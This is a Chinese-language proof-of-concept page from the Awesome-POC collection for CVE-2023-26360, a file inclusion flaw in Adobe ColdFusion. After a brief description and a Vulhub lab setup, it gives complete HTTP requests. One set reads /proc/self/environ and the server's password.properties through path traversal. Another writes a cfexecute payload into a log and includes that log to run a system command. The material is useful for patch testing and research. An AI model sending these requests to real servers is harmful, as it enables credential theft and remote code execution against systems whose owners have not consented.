admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Adobe ColdFusion 本地文件包含漏洞 CVE-2023-26360.md

82 lines
3.2 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Adobe ColdFusion 本地文件包含漏洞 CVE-2023-26360
## 漏洞描述
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品其运行的CFMLColdFusion Markup Language是针对Web应用的一种程序设计语言。
Adobe ColdFusion 2018 Update 15 和 2021 Update 5 版本及以前,存在一处文件包含漏洞。攻击者可以利用该漏洞在服务器上执行任意代码。
参考链接:
- [https://xz.aliyun.com/t/13392](https://xz.aliyun.com/t/13392)
## 环境搭建
Vulhub启动一个Adobe ColdFusion 2018.0.15服务器:
```
docker compose up -d
```
等待一段时间后环境启动成功,访问`http://your-vps-ip:8500/CFIDE/administrator/index.cfm`,输入密码`vulhub`即可成功安装Adobe ColdFusion。
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153449288.png)
## 漏洞复现
发送如下请求即可读取文件`/proc/self/environ`
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 82
Content-Type: application/x-www-form-urlencoded
_variables={"_metadata":{"classname":"../../../../../../../../proc/self/environ"}}
```
可以在返回包中找到Adobe ColdFusion的根目录`/opt/coldfusion/cfusion`
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153705716.png)
`../../../../../../../../opt/coldfusion/cfusion/lib/password.properties`中读取服务器密码:
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153740311.png)
想要利用文件包含漏洞执行任意代码需要先发送如下请求来写入CFM脚本
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
_variables=<cfexecute name='id' outputFile='/tmp/awesome_poc' ></cfexecute>
```
然后包含日志文件执行该CFM代码
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
_variables={"_metadata":{"classname":"../../../../../../../../opt/coldfusion/cfusion/logs/coldfusion-out.log"}}
```
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153957320.png)
可见,`id`命令的执行结果已经被写入`/tmp/awesome_poc
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153931349.png)
Reference in New Issue Copy Permalink